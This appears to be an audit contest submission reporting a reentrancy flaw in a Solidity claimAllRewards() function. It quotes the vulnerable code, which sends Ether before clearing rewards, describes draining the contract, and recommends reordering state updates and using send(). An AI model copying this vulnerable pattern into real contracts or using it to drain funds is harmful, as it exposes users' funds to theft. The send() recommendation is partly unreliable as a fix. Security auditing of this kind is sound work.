Submission Details
Severity:
REENTRANCY IN VULNERABILITY IN `clainAllRewards()` FUNCTIONS
Summary:
The bug occurs because the function sends Ether to caller using `call` function which can call back into the function before the call is updated.
Vulnerability Details:
function claimAllRewards() public {
uint256 totalValue = 0;
for (uint256 i = 0; i < rewardsOwned[msg.sender].length; i++) {
totalValue += rewardsOwned[msg.sender][i].value;
}
require(totalValue > 0, "No rewards to claim");
(bool success,) = payable(msg.sender).call{value: totalValue}("");
require(success, "Transfer failed");
delete rewardsOwned[msg.sender];
}
Impact:
An attacker could repeatedly call the `claimAllRewards()` function to exhaust the contracts funds. this could make the contract
unable to fulfil its obligation, leading to a denial of service.
An attacker could exploit the reentrancy by calling the
claimAllReward()function before the contract has updated the reward
array.
As a result the contract will transfer Ether to the attackers address and the rewards array will remain unchanged, allowing the
attcker to claim the rewards again in subsequent calls.
Tools Used:
Aderyn and slither.
Recommendations:
Update the state before making external calls.
Use the `send()` functions instead of `call()`
Updates
Appeal created
inallhonesty about 1 year ago
Submission Judgement Published Assigned finding tags:
`claimAllRewards` reentrancy
Rewards breakdown
nSLOC
86This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.